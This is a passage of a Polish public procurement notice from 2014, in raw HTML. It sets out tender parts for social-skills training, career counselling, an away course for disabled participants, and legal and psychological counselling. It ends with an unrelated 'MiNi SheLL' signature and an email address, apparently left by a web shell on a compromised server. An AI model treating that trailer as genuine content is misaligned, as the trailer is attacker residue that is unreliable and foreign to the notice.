Należy przedstawić program wszystkich zajęć obejmujący minimum 35 godzin dydaktycznych - 34 godz na osobę zajęć grupowych+1 godzina zajęć indywidualnych na osobę (godzina szkolenia = godzina lekcyjna = 45 min).
Zajęcia teoretyczne i praktyczne winny odbywać się po max 7 godz. Lekcyjnych.
Zadanie B
Nazwa szkolenia: Trening umiejętności społecznych + indywidualne i grupowe doradztwo zawodowe
Usługi szkolenia w dziedzinie rozwoju osobistego. Przewidziano do przeszkolenia 29 osób, 16 osób w wieku 15 - 30 oraz 13 osób powyżej 50 roku życia podzielonych na te 2 grupy wiekowe.
Liczba osób: 29 osób
Czas trwania szkolenia: od dnia podpisania umowy do 31.12.2014r.
Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 35 godzin dydaktycznych - 34 godz na osobę zajęć grupowych+1 godzina zajęć indywidualnych na osobę (godzina szkolenia = godzina lekcyjna = 45 min). Zajęcia teoretyczne i praktyczne winny odbywać się po max 7 godz. lekcyjnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Organizacja i przeprowadzenie szkolenia wyjazdowego z zakresu treningu umiejętności społecznych + indywidualne i grupowe doradztwo zawodowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba osób i czas trwania szkolenia:
W szkoleniu powyższym będzie uczestniczyć grupa 10 osób niepełnosprawnych z umiarkowanym i lekkim stopniem niepełnosprawności (choroby układu oddechowego i krążenia, ruchowe), będące w wieku aktywności zawodowej, korzystające ze świadczeń pomocy społecznej, zagrożone wykluczeniem społecznym. Realizacja szkolenia trwać będzie 7 dni (6 noclegów) i musi zakończyć się do 31.12.2014r. Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych umiejętności, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie. 
Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 35 godzin dydaktycznych - 34 godz na osobę zajęć grupowych+1 godzina zajęć indywidualnych na osobę (godzina szkolenia = godzina lekcyjna = 45 min)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0, 85.31.23.20-8, 55.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Przeprowadzenie specjalistycznego poradnictwa prawnego, rodzinnego i psychologicznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba osób: 62 osoby
Czas trwania : od dnia podpisania umowy do 31.12.2014r
Liczba godzin szkolenia
Indywidualne poradnictwo prawne. Przedmiotem zamówienia jest przeprowadzenie 62 godzin konsultacji prawnych (1 godzina = 60 minut)
Konsultacje w ramach poradnictwa psychologicznego z psychologiem lub psychoterapeutą. Przedmiotem zamówienia jest przeprowadzenie 62 godzin konsultacji psychologicznych i rodzinnych (1 godzina=60 minut)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 79.14.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com